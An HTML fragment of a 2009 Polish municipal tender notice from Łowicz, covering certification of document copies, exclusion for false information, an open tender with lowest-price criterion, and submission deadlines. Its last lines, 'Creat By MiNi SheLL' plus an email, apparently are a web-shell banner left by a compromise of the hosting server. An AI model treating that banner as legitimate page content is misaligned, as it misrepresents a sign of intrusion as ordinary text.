   Kopie dokumentów winny być poświadczone za zgodność z oryginałem przez  Wykonawcę - zgodnie z formą reprezentacji określoną w rejestrze handlowym, kodeksie cywilnym lub w gminnej ewidencji działalności gospodarczej i opatrzone datą potwierdzenia.
   Złożenie przez oferenta fałszywych lub stwierdzających nieprawdę dokumentów jest karalne. Zgodnie z   art. 24 ust. 2 pkt. 2 ustawy wykonawca, który złożył nieprawdziwe informacje mające wpływ na wynik postępowania zostaje wykluczony z postępowania. Gdy fakt podania  nieprawdziwych informacji wyjdzie  na jaw po zawarciu umowy - umowa taka jest  nieważna z mocy prawa.
     W przypadku spółki cywilnej lub konsorcjum wymaga się dostarczenia dokumentów wymienionych  w pkt.  a), e) , f),  g),  złożonych przez każdego wspólnika lub  konsorcjanta  z  osobna.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.lowicz.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łowiczu, Stary Rynek 1, 99-400 Łowicz, bud B pok.40.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2009 godzina 10:00, miejsce: Urząd Miejski w Łowiczu, Stary Rynek 1, 99-400 Łowicz, bud A pok. 9 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com